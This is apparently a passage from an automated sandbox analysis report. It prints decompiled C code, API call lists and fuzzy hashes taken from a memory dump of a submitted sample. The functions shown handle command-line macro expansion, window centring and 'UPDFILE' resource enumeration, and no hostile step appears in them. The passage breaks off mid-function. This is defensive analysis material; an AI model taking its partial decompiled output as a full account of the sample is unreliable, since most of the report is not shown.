                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                                                            • Instruction ID: 78a44bd075de18e715d94eb13e92715ccdd260d55f59fb6f0fe47dde640acd54
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2601B132340114ABDF269FA9DC0C96E3AF4EB89702F224126F956865A0CF719F43CBC5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A92AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E00A965E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a92aac
                                                                                                                                                                                                                                            0x00a92ab7
                                                                                                                                                                                                                                            0x00a92abc
                                                                                                                                                                                                                                            0x00a92abe
                                                                                                                                                                                                                                            0x00a92ac3
                                                                                                                                                                                                                                            0x00a92ac6
                                                                                                                                                                                                                                            0x00a92ac9
                                                                                                                                                                                                                                            0x00a92ace
                                                                                                                                                                                                                                            0x00a92ae6
                                                                                                                                                                                                                                            0x00a92bdc
                                                                                                                                                                                                                                            0x00a92bdc
                                                                                                                                                                                                                                            0x00a92be0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92af2
                                                                                                                                                                                                                                            0x00a92afc
                                                                                                                                                                                                                                            0x00a92b00
                                                                                                                                                                                                                                            0x00a92b05
                                                                                                                                                                                                                                            0x00a92b05
                                                                                                                                                                                                                                            0x00a92b0b
                                                                                                                                                                                                                                            0x00a92bca
                                                                                                                                                                                                                                            0x00a92bd1
                                                                                                                                                                                                                                            0x00a92b11
                                                                                                                                                                                                                                            0x00a92b18
                                                                                                                                                                                                                                            0x00a92b26
                                                                                                                                                                                                                                            0x00a92b99
                                                                                                                                                                                                                                            0x00a92bc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92b9b
                                                                                                                                                                                                                                            0x00a92bae
                                                                                                                                                                                                                                            0x00a92bb3
                                                                                                                                                                                                                                            0x00a92bb5
                                                                                                                                                                                                                                            0x00a92bb5
                                                                                                                                                                                                                                            0x00a92bb8
                                                                                                                                                                                                                                            0x00a92bb8
                                                                                                                                                                                                                                            0x00a92bba
                                                                                                                                                                                                                                            0x00a92bbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92bb8
                                                                                                                                                                                                                                            0x00a92b28
                                                                                                                                                                                                                                            0x00a92b2e
                                                                                                                                                                                                                                            0x00a92b33
                                                                                                                                                                                                                                            0x00a92b39
                                                                                                                                                                                                                                            0x00a92b3c
                                                                                                                                                                                                                                            0x00a92b3c
                                                                                                                                                                                                                                            0x00a92b3e
                                                                                                                                                                                                                                            0x00a92b3f
                                                                                                                                                                                                                                            0x00a92b55
                                                                                                                                                                                                                                            0x00a92b5d
                                                                                                                                                                                                                                            0x00a92b64
                                                                                                                                                                                                                                            0x00a92b64
                                                                                                                                                                                                                                            0x00a92b7a
                                                                                                                                                                                                                                            0x00a92b7f
                                                                                                                                                                                                                                            0x00a92b81
                                                                                                                                                                                                                                            0x00a92b81
                                                                                                                                                                                                                                            0x00a92b84
                                                                                                                                                                                                                                            0x00a92b84
                                                                                                                                                                                                                                            0x00a92b86
                                                                                                                                                                                                                                            0x00a92b87
                                                                                                                                                                                                                                            0x00a92bbf
                                                                                                                                                                                                                                            0x00a92bc1
                                                                                                                                                                                                                                            0x00a92bc1
                                                                                                                                                                                                                                            0x00a92b26
                                                                                                                                                                                                                                            0x00a92bda
                                                                                                                                                                                                                                            0x00a92bda
                                                                                                                                                                                                                                            0x00a92be6
                                                                                                                                                                                                                                            0x00a92be6
                                                                                                                                                                                                                                            0x00a92bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A92AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A92AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A92B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00A92B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00A92B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A92BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                                                            • Instruction ID: 15b1386419034eab08e3b6eff8aaa4ecc41ec0eebcd8d74a5edd9c0943868fc2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141D0347042466EDF159F249C54BFD7BE99FA6310F24419BE8C287202DF258E86CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x00a943d0
                                                                                                                                                                                                                                            0x00a943d8
                                                                                                                                                                                                                                            0x00a943df
                                                                                                                                                                                                                                            0x00a943e6
                                                                                                                                                                                                                                            0x00a943ec
                                                                                                                                                                                                                                            0x00a943f1
                                                                                                                                                                                                                                            0x00a94400
                                                                                                                                                                                                                                            0x00a94403
                                                                                                                                                                                                                                            0x00a9440b
                                                                                                                                                                                                                                            0x00a94420
                                                                                                                                                                                                                                            0x00a94429
                                                                                                                                                                                                                                            0x00a94437
                                                                                                                                                                                                                                            0x00a94444
                                                                                                                                                                                                                                            0x00a94447
                                                                                                                                                                                                                                            0x00a9444d
                                                                                                                                                                                                                                            0x00a94454
                                                                                                                                                                                                                                            0x00a9445b
                                                                                                                                                                                                                                            0x00a94460
                                                                                                                                                                                                                                            0x00a94461
                                                                                                                                                                                                                                            0x00a94467
                                                                                                                                                                                                                                            0x00a9446f
                                                                                                                                                                                                                                            0x00a94473
                                                                                                                                                                                                                                            0x00a94473
                                                                                                                                                                                                                                            0x00a94463
                                                                                                                                                                                                                                            0x00a94463
                                                                                                                                                                                                                                            0x00a94463
                                                                                                                                                                                                                                            0x00a9447a
                                                                                                                                                                                                                                            0x00a94481
                                                                                                                                                                                                                                            0x00a94484
                                                                                                                                                                                                                                            0x00a9448a
                                                                                                                                                                                                                                            0x00a94492
                                                                                                                                                                                                                                            0x00a94496
                                                                                                                                                                                                                                            0x00a94496
                                                                                                                                                                                                                                            0x00a94486
                                                                                                                                                                                                                                            0x00a94486
                                                                                                                                                                                                                                            0x00a94486
                                                                                                                                                                                                                                            0x00a944b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00A943F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A9440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00A94423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A9442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A9443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00A94447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A944A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
                                                                                                                                                                                                                                            • Instruction ID: 59f9e04058dd83d851518cf3fad4023b0ebe8494be27bdc0b04e7e811fdae6d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C931FD72B00119ABCF14CFF8DD49DAEBBB5EB89310F15426AE805B7250DA706D068BA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00A96298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E00A9171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0xa9a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E00A9171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00A96CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a96298
                                                                                                                                                                                                                                            0x00a962a0
                                                                                                                                                                                                                                            0x00a962a7
                                                                                                                                                                                                                                            0x00a962ad
                                                                                                                                                                                                                                            0x00a962af
                                                                                                                                                                                                                                            0x00a962bb
                                                                                                                                                                                                                                            0x00a962c3
                                                                                                                                                                                                                                            0x00a962c4
                                                                                                                                                                                                                                            0x00a9633b
                                                                                                                                                                                                                                            0x00a9633b
                                                                                                                                                                                                                                            0x00a96345
                                                                                                                                                                                                                                            0x00a9634d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a962da
                                                                                                                                                                                                                                            0x00a962de
                                                                                                                                                                                                                                            0x00a9635f
                                                                                                                                                                                                                                            0x00a96369
                                                                                                                                                                                                                                            0x00a962e0
                                                                                                                                                                                                                                            0x00a962e0
                                                                                                                                                                                                                                            0x00a962e0
                                                                                                                                                                                                                                            0x00a962e3
                                                                                                                                                                                                                                            0x00a962e5
                                                                                                                                                                                                                                            0x00a962e5
                                                                                                                                                                                                                                            0x00a962e8
                                                                                                                                                                                                                                            0x00a962e8
                                                                                                                                                                                                                                            0x00a962ea
                                                                                                                                                                                                                                            0x00a962eb
                                                                                                                                                                                                                                            0x00a962ef
                                                                                                                                                                                                                                            0x00a962f1
                                                                                                                                                                                                                                            0x00a962f3
                                                                                                                                                                                                                                            0x00a96302
                                                                                                                                                                                                                                            0x00a96308
                                                                                                                                                                                                                                            0x00a9630d
                                                                                                                                                                                                                                            0x00a96314
                                                                                                                                                                                                                                            0x00a96314
                                                                                                                                                                                                                                            0x00a96316
                                                                                                                                                                                                                                            0x00a96319
                                                                                                                                                                                                                                            0x00a96355
                                                                                                                                                                                                                                            0x00a96357
                                                                                                                                                                                                                                            0x00a9631b
                                                                                                                                                                                                                                            0x00a9631b
                                                                                                                                                                                                                                            0x00a96331
                                                                                                                                                                                                                                            0x00a96334
                                                                                                                                                                                                                                            0x00a96339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96339
                                                                                                                                                                                                                                            0x00a96319
                                                                                                                                                                                                                                            0x00a9636b
                                                                                                                                                                                                                                            0x00a9637d
                                                                                                                                                                                                                                            0x00a9637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A9631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A96345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A96357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                                                            • Instruction ID: 68fd33d2768a97667c23c2560d60545a4170604dfd600887d50fa6f1f0419a1b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E521D675B00219ABDF10DFA49C459FF7BB8FF48714B10421AF902A7241DB359D068BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A9681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
